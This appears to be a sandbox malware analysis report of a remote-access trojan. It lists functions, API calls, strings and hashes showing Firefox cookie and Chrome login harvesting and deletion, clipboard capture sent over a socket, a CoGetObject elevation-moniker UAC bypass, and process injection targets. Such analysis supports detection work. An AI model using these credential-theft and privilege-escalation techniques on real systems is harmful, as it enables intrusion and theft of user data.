                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                    • String ID: !D@
                                                                                                                                                                    • API String ID: 3520204547-604454484
                                                                                                                                                                    • Opcode ID: 6e793caff493ff3e52790fa1c77f2f07f3351176aacbb80bec49ed1ed1cde3b6
                                                                                                                                                                    • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e793caff493ff3e52790fa1c77f2f07f3351176aacbb80bec49ed1ed1cde3b6
                                                                                                                                                                    • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$Close$File$FirstNext
                                                                                                                                                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                    • API String ID: 3527384056-432212279
                                                                                                                                                                    • Opcode ID: a832034822c3cb66eb5f8080b7cde16d67028b55a024d1e421a8b91fcbbd43ec
                                                                                                                                                                    • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                                                                                                                                    • Opcode Fuzzy Hash: a832034822c3cb66eb5f8080b7cde16d67028b55a024d1e421a8b91fcbbd43ec
                                                                                                                                                                    • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004132D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00413465
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 297527592-0
                                                                                                                                                                    • Opcode ID: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                                                                                                                    • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                                                                                                                                    • Opcode Fuzzy Hash: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                                                                                                                    • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                                                                                                                                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                                                                                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                                                                    • API String ID: 3756808967-1743721670
                                                                                                                                                                    • Opcode ID: a44d1c149e9206c8c5790be5d5281b0a3ac589c6ddaf07dd4e5038071b524407
                                                                                                                                                                    • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                                                                                                                                    • Opcode Fuzzy Hash: a44d1c149e9206c8c5790be5d5281b0a3ac589c6ddaf07dd4e5038071b524407
                                                                                                                                                                    • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                                                                    • API String ID: 0-1861860590
                                                                                                                                                                    • Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                                                                                                                    • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                                                                                                                                    • Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                                                                                                                    • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _wcslen.LIBCMT ref: 00407521
                                                                                                                                                                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Object_wcslen
                                                                                                                                                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                    • API String ID: 240030777-3166923314
                                                                                                                                                                    • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                                                                                                                    • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                                                                                                                                    • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                                                                                                                    • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                                                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041A7BB
                                                                                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3587775597-0
                                                                                                                                                                    • Opcode ID: c686599948fa5da1445dac0334782799476a653eb7c8e4d05ef1c0b84818098d
                                                                                                                                                                    • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                                                                                                                                    • Opcode Fuzzy Hash: c686599948fa5da1445dac0334782799476a653eb7c8e4d05ef1c0b84818098d
                                                                                                                                                                    • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                    • API String ID: 1164774033-405221262
                                                                                                                                                                    • Opcode ID: 9baee15444d151661bac6597f15491a93abea62e6db9052377387430c257f9de
                                                                                                                                                                    • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                                                                                                                                    • Opcode Fuzzy Hash: 9baee15444d151661bac6597f15491a93abea62e6db9052377387430c257f9de
                                                                                                                                                                    • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                                                                                                                                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2341273852-0
                                                                                                                                                                    • Opcode ID: a5eb3ddd6edf47b185b46ec297d14847becf751be7614732afc11e449a0b0cbf
                                                                                                                                                                    • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                                                                                                                                    • Opcode Fuzzy Hash: a5eb3ddd6edf47b185b46ec297d14847becf751be7614732afc11e449a0b0cbf
                                                                                                                                                                    • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                                                                                                                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Find$CreateFirstNext
                                                                                                                                                                    • String ID: 8SG$PXG$PXG$NG$PG
                                                                                                                                                                    • API String ID: 341183262-3812160132
                                                                                                                                                                    • Opcode ID: 17e404fab42117a95efd329cb0ff4af70f016aee304aa76f89f91f03962f64ed
                                                                                                                                                                    • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                                                                                                                                                    • Opcode Fuzzy Hash: 17e404fab42117a95efd329cb0ff4af70f016aee304aa76f89f91f03962f64ed
                                                                                                                                                                    • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                    • API String ID: 2127411465-314212984
                                                                                                                                                                    • Opcode ID: b8be7d43ccea86f00341678901180a47eff9e8f17ad8a8565ee2a5e7b7fb4677
                                                                                                                                                                    • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                                                                                                                                    • Opcode Fuzzy Hash: b8be7d43ccea86f00341678901180a47eff9e8f17ad8a8565ee2a5e7b7fb4677
                                                                                                                                                                    • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                                                                                                                      • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                                                                                                                      • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                                                                                                                      • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                                                                                                                      • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                                                                                                                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                                                                                                                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                    • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                                                    • API String ID: 1589313981-2876530381
                                                                                                                                                                    • Opcode ID: 8ab362c5c31131a6b6b5401f7c459622763a6f826cc29e57ee0f5cd5f5ab97ee
                                                                                                                                                                    • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                                                                                                                                    • Opcode Fuzzy Hash: 8ab362c5c31131a6b6b5401f7c459622763a6f826cc29e57ee0f5cd5f5ab97ee
                                                                                                                                                                    • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040BA58
                                                                                                                                                                    Strings
                                                                                                                                                                    • UserProfile, xrefs: 0040BA1E
                                                                                                                                                                    • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                                                                                                                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                                                                                                                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DeleteErrorFileLast
                                                                                                                                                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                    • API String ID: 2018770650-1062637481
                                                                                                                                                                    • Opcode ID: c04ade68c18fbe0e569556c46b8928cb2529683c30f590f27aedceba8b26999c
                                                                                                                                                                    • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                                                                                                                                    • Opcode Fuzzy Hash: c04ade68c18fbe0e569556c46b8928cb2529683c30f590f27aedceba8b26999c
                                                                                                                                                                    • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041799D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                    • API String ID: 3534403312-3733053543
                                                                                                                                                                    • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                                                                                                                    • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                                                                                                                                    • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                                                                                                                    • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                                                                                                                                    Uniqueness

